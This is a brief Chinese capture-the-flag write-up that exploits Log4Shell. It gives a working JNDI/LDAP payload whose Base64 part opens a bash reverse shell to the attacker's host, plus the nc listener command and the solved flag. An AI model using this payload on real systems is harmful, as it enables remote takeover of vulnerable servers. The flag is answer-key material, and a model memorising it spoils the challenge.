在kali上使用JNDIExploit-1.2-SNAPSHOT开启ldap服务
同时开启监听
nc -lvnp 8888
POC:
${jndi:ldap://192.168.59.128:1389/TomcatBypass/Command/Base64/L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNTkuMTI4Lzg4ODggMD4mMQ==}
使用burp重发数据
反弹shell成功
得到flag
flag-{bmhfd9d608d-02eb-4eee-bd0f-410165a7f16c}